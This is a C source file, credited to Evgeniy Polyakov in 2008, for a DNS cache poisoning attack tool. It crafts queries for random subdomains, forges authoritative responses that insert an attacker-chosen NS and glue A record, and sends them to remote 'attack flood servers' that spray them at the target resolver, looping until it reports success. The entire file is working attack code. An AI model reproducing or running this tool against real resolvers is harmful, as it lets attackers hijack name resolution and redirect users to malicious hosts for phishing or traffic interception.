/*
 * 2008+ Copyright (c) Evgeniy Polyakov <johnpol@2ka.mipt.ru>
 * All rights reserved.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 */

#include <sys/types.h>
#include <sys/socket.h>

#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <dirent.h>
#include <pthread.h>
#include <signal.h>
#include <poll.h>

#include <netinet/in.h>
#include <arpa/inet.h>

#include "query.h"
#include "list.h"
#include "attack.h"

static char default_server_addr[] = "127.0.0.1";
static char default_server_port[] = "53";
static int default_query_protocol = IPPROTO_UDP;
static char default_query[] = "www.tservice.net.ru";
static char default_ns_query[] = "nserver.tservice.net.ru";
static char default_query_addr[] = "127.0.0.1";
static char default_auth_addr[] = "127.0.0.1";
static int default_query_class = QUERY_CLASS_IN;
static int default_query_type = QUERY_TYPE_A;

static LIST_HEAD(attack_server_list);

static int query_init_socket(char *addr, char *port,
		int proto, struct sockaddr *sa, unsigned int *addrlen)
{
	int s, err;
	struct addrinfo *ai, hint;
	int type = SOCK_STREAM;

	if (proto == IPPROTO_UDP)
		type = SOCK_DGRAM;

	s = socket(AF_INET, type, proto);
	if (s < 0) {
		ulog_err("Failed to create a socket");
		return -1;
	}
#if 0
	{
		char *a, *p;

		memset(&hint, 0, sizeof(struct addrinfo));

		hint.ai_flags = AI_NUMERICSERV;
		hint.ai_family = AF_INET;
		hint.ai_socktype = type;
		hint.ai_protocol = proto;

		a = "0.0.0.0";
		p = "1025";

		err = getaddrinfo(a, p, &hint, &ai);
		if (err) {
			ulog_err("Failed to get address to bind to %s:%s, err: %d", a, p, err);
			goto err_out_close;
		}

		err = bind(s, ai->ai_addr, ai->ai_addrlen);
		if (err) {
			ulog_err("Failed to bind to %s:%s", a, p);
			goto err_out_free;
		}

		freeaddrinfo(ai);
	}
#endif
	memset(&hint, 0, sizeof(struct addrinfo));

	hint.ai_flags = AI_NUMERICSERV;
	hint.ai_family = AF_INET;
	hint.ai_socktype = type;
	hint.ai_protocol = proto;

	err = getaddrinfo(addr, port, &hint, &ai);
	if (err) {
		ulog_err("Failed to get address info for %s:%s, err: %d", addr, port, err);
		goto err_out_close;
	}

	err = connect(s, ai->ai_addr, ai->ai_addrlen);
	if (err) {
		ulog_err("Failed to connect to %s:%s", addr, port);
		goto err_out_free;
	}

	if (sa && addrlen) {
		if (*addrlen > ai->ai_addrlen)
			*addrlen = ai->ai_addrlen;

		memcpy(sa, ai->ai_addr, *addrlen);
	}

	freeaddrinfo(ai);

	ulog("Connected to %s:%s.\n", addr, port);

	return s;

err_out_free:
	freeaddrinfo(ai);
err_out_close:
	close(s);
	return -1;

}

struct attack_server
{
	struct list_head		entry;
	struct sockaddr_in		addr;
	unsigned int			addrlen;
	int				s;
	int				pmin, pmax;
};

static int add_attack_server(char *addr)
{
	char *port, *ports;
	int pmin, pmax;
	struct attack_server *a;

	port = strchr(addr, ':');
	if (!port || !port[1]) {
		uloga("Wrong attack server format (addr:port). You have to specify 'addr:port:pmin-pmax'.\n");
		goto err_out_exit;
	}
	*port++ = '\0';

	ports = strchr(port, ':');
	if (!ports || !ports[1]) {
		uloga("Wrong attack server format (port:). You have to specify 'addr:port:pmin-pmax'.\n");
		goto err_out_exit;
	}
	*ports++ = '\0';

	if (sscanf(ports, "%d-%d", &pmin, &pmax) != 2) {
		uloga("Wrong attack server format (pmin-pmax). You have to specify 'addr:port:pmin-pmax'.\n");
		goto err_out_exit;
	}

	a = malloc(sizeof(struct attack_server));
	if (!a)
		goto err_out_exit;

	a->addrlen = sizeof(struct sockaddr_in);
	a->pmin = pmin;
	a->pmax = pmax;

	a->s = query_init_socket(addr, port, IPPROTO_TCP, (struct sockaddr *)&a->addr, &a->addrlen);
	if (a->s < 0) {
		ulog("Failed to connect to attack server %s:%s.\n", addr, port);
		goto err_out_free;
	}

	list_add_tail(&a->entry, &attack_server_list);

	return 0;

err_out_free:
	free(a);
err_out_exit:
	return -1;
}

static void query_usage(char *p)
{
	uloga("Usage: %s <options>\n", p);
	uloga("	-a addr				- DNS server address. Default: %s.\n", default_server_addr);
	uloga("	-p port				- DNS server port. Default: %s.\n", default_server_port);
	uloga("	-P protocol			- query protocol. Default: %d.\n", default_query_protocol);
	uloga("	-q query			- query. Default: %s.\n", default_query);
	uloga("	-n server			- poisoned name server section for above query. Default: %s.\n", default_ns_query);
	uloga("	-Q addr				- query address. Default: %s.\n", default_query_addr);
	uloga("	-t type				- query type. Default: %d.\n", default_query_type);
	uloga("	-c class			- query class. Default: %d.\n", default_query_class);
	uloga("	-A addr				- auth server address. Default: %s.\n", default_auth_addr);
	uloga("	-s server:port:pmin-pmax	- attack flood servers. Default: no.\n");
	uloga("	-h				- this help.\n");
}

static int create_query(void *buf, char *query,
		__u16 type, __u16 class, int proto, __u16 id)
{
	struct query_header *h;
	void *q;
	int query_len;

	h = (struct query_header *)buf;
	if (proto == IPPROTO_TCP)
		h = (struct query_header *)(buf+2);
	q = (void *)(h + 1);

	query_fill_header(h, id);
	q = query_fill_question(q, query, type, class);
	h->question_num++;
	query_header_convert(h);

	query_len = q - (void *)buf;

	if (proto == IPPROTO_TCP) {
		__u16 *len = (__u16 *)buf;
		*len = ntohs(query_len);
		query_len += 2;
	}

	return query_len;
}

static int query_add_ns(void *data, char *hostq, char *nsq)
{
	char ns[128], host[128];
	char buf[sizeof(struct rr) + 128];
	struct rr *rr = (struct rr *)buf;
	int total = 0;
	int size;

	snprintf(host, sizeof(host), "%s", hostq);
	snprintf(ns, sizeof(ns), "%s", nsq);

	size = query_fill_name(host, data);
	data += size;
	total += size;

	rr->type = QUERY_TYPE_NS;
	rr->class = QUERY_CLASS_IN;
	rr->ttl = 123456;
	
	rr->rdlen = query_fill_name(ns, (char *)rr->rdata);

	size = query_add_rr_noname(data, rr);
	total += size;
	data += size;

	return total;
}

static int create_response(void *data, char *query, __u32 query_addr,
		char *addon, char *ns, __u32 ns_addr, __u16 type, __u16 class)
{
	char buf[sizeof(struct rr) + 128];
	struct rr *rr = (struct rr *)buf;
	struct query_header *h = data;
	int size;
	void *q = (h + 1);
	
	rr->type = type;
	rr->class = class;
	rr->ttl = 123456;
	rr->rdlen = 4;

	query_fill_header(h, 0);

	memcpy(rr->rdata, &query_addr, 4);
	q = query_fill_question(q, query, type, class);
	h->question_num++;

	size = query_add_rr(q, rr);
	q += size;
	h->answer_num++;

	size = query_add_ns(q, addon, ns);
	q += size;
	h->auth_num++;

	size = query_fill_name(ns, q);
	q += size;

	memcpy(rr->rdata, &ns_addr, 4);
	size = query_add_rr_noname(q, rr);
	q += size;
	h->addon_num++;

	h->flags |= QUERY_FLAGS_RESPONSE | QUERY_FLAGS_RA | QUERY_FLAGS_AA;

	query_header_convert(h);
	return q - data;
}

static void destroy_attack_server(struct attack_server *a)
{
	ulog("Destroyed attack server %s:%d\n",
		inet_ntoa(a->addr.sin_addr), ntohs(a->addr.sin_port));
	list_del(&a->entry);
	close(a->s);
	free(a);
}

static int broadcast_attack_response(void *buf, int size, struct sockaddr_in *sa, __u32 saddr)
{
	char data[size + sizeof(struct attack_data)];
	struct attack_data *adata = (struct attack_data *)data;
	struct attack_server *a, *atmp;
	int err;

	adata->size = htonl(size);
	memcpy(adata+1, buf, size);
	adata->daddr = sa->sin_addr.s_addr;
	adata->saddr = saddr;

	list_for_each_entry_safe(a, atmp, &attack_server_list, entry) {
		adata->pmin = ntohs(a->pmin);
		adata->pmax = ntohs(a->pmax);

		err = send(a->s, data, sizeof(data), 0);
		if (err <= 0) {
			ulog_err("\nFailed to broadcast attack data to %s:%d, err: %d",
				inet_ntoa(a->addr.sin_addr), ntohs(a->addr.sin_port), err);
			destroy_attack_server(a);
		}

		uloga(".");
	}

	return -list_empty(&attack_server_list);
}

int parse_answer(void *data, __u32 *poison_addr)
{
	void *rrh;
	struct query_header *h = data;
	struct rr *rr;
	int i, ret;
	unsigned int offset;
	char name[QUERY_RR_NAME_MAX_SIZE];
	__u16 type, class;

	query_parse_header(h);

	rrh = (void *)(h + 1);
	for (i=0; i<h->question_num; ++i) {
		rrh += query_parse_question(data, rrh, name, &type, &class);
	}

	if (!h->answer_num)
		return -1;

	offset = 0;
	rr = query_parse_rr(data, rrh, &offset);
	if (!rr)
		return -1;

	ret = -1;
	if (!memcmp(rr->rdata, poison_addr, 4))
		ret = 0;

	free(rr);

	return ret;
}

static void sigpipe_signal(int signo __attribute__ ((unused)))
{
}

int main(int argc, char *argv[])
{
	int ch, proto, class, type, s, err, query_len, response_len, num;
	unsigned int salen;
	char *addr, *port, *query, *query_addr, *auth, *ns_query, *base;
	struct attack_server *a, *atmp;
	char rbuf[16*1024];
	char qbuf[16*1024];
	char attack_query[256], tmpq[256], nsq[256], attack_tmpq[256];
	__u32 poison_addr, auth_addr;
	__u16 id;
	struct query_header *h;
	struct sockaddr_in sa;

	addr = default_server_addr;
	port = default_server_port;
	proto = default_query_protocol;
	query = default_query;
	ns_query = default_ns_query;
	query_addr = default_query_addr;
	auth = default_auth_addr;
	class = default_query_class;
	type = default_query_type;

	while ((ch = getopt(argc, argv, "n:A:s:Q:q:c:t:a:p:P:h")) != -1) {
		switch (ch) {
			case 'A':
				auth = optarg;
				break;
			case 'Q':
				query_addr = optarg;
				break;
			case 'n':
				ns_query = optarg;
				break;
			case 'q':
				query = optarg;
				break;
			case 'c':
				class = atoi(optarg);
				break;
			case 't':
				type = atoi(optarg);
				break;
			case 'p':
				port = optarg;
				break;
			case 'a':
				addr = optarg;
				break;
			case 'P':
				proto = atoi(optarg);
				break;
			case 's':
				add_attack_server(optarg);
				break;
			default:
				query_usage(argv[0]);
				return -1;
		}
	}

	if (list_empty(&attack_server_list)) {
		uloga("You have to provide attack servers.\n");
		return -1;
	}

	uloga("query: '%s', query addr: %s, class: %d, type: %d, server: %s:%s, protocol: %d, attack servers: ",
			query, query_addr, class, type, addr, port, proto);
	list_for_each_entry(a, &attack_server_list, entry) {
		uloga("%s:%d ", inet_ntoa(a->addr.sin_addr), ntohs(a->addr.sin_port));
	}
	uloga("\n");

	salen = sizeof(struct sockaddr_in);
	s = query_init_socket(addr, port, proto, (struct sockaddr *)&sa, &salen);
	if (s < 0)
		return -1;

	inet_aton(query_addr, (struct in_addr *)&poison_addr);
	inet_aton(auth, (struct in_addr *)&auth_addr);

	srand(time(NULL));
	signal(SIGPIPE, sigpipe_signal);

	base = strchr(query, '.');
	if (!base) {
		uloga("Broken query '%s', can not get base name (after first dot).\n", query);
		return -1;
	}

	base++;

	num = 0;
	while (1) {
		num++;
		id = 1 + (int)(65535.0 * (rand() / (RAND_MAX + 1.0)));

		snprintf(tmpq, sizeof(tmpq), "%s", query);
		snprintf(nsq, sizeof(nsq), "%s", ns_query);
		snprintf(attack_query, sizeof(attack_query), "%d-%04x-%d.%s", num, id, getpid(), base);

		memcpy(attack_tmpq, attack_query, sizeof(attack_tmpq));
		query_len = create_query(qbuf, attack_tmpq, type, class, proto, id);
		if (query_len < 0)
			return -1;

		memcpy(attack_tmpq, attack_query, sizeof(attack_tmpq));
		response_len = create_response(rbuf, attack_tmpq, poison_addr, tmpq, nsq, poison_addr,
				type, class);
		if (response_len < 0)
			return -1;

		uloga("Using attack query: %s ", attack_query);
		err = broadcast_attack_response(rbuf, response_len, &sa, auth_addr);
		if (err)
			return -1;
		uloga("\n");

		err = send(s, qbuf, query_len, 0);
		if (err <= 0) {
			ulog_err("Failed to send query");
			return err;
		}

		{
			struct pollfd pfd;

			pfd.fd = s;
			pfd.events = POLLIN;
			pfd.revents = 0;

			err = poll(&pfd, 1, 5000);
			if (err < 0) {
				ulog_err("Failed to work with poll");
				return err;
			}

			if (err == 0 || !(pfd.revents & POLLIN)) {
				ulog("Timeout waiting for reply.\n");
				continue;
			}
		}

		err = recv(s, qbuf, sizeof(qbuf), 0);
		if (err <= 0) {
			ulog_err("Failed to receive reply");
			return err;
		}

		h = (struct query_header *)qbuf;
		if (proto == IPPROTO_TCP)
			h = (struct query_header *)(qbuf + 2);

		err = parse_answer(h, &poison_addr);
		if (!err) {
			uloga("Successfully poisoned %s:%s DNS server\n", addr, port);
			uloga("	%s IN NS	%s\n", query, ns_query);
			uloga("	%s IN A		%s\n", ns_query, query_addr);
			break;
		}
	}
	
	list_for_each_entry_safe(a, atmp, &attack_server_list, entry) {
		destroy_attack_server(a);
	}

	return 0;
}
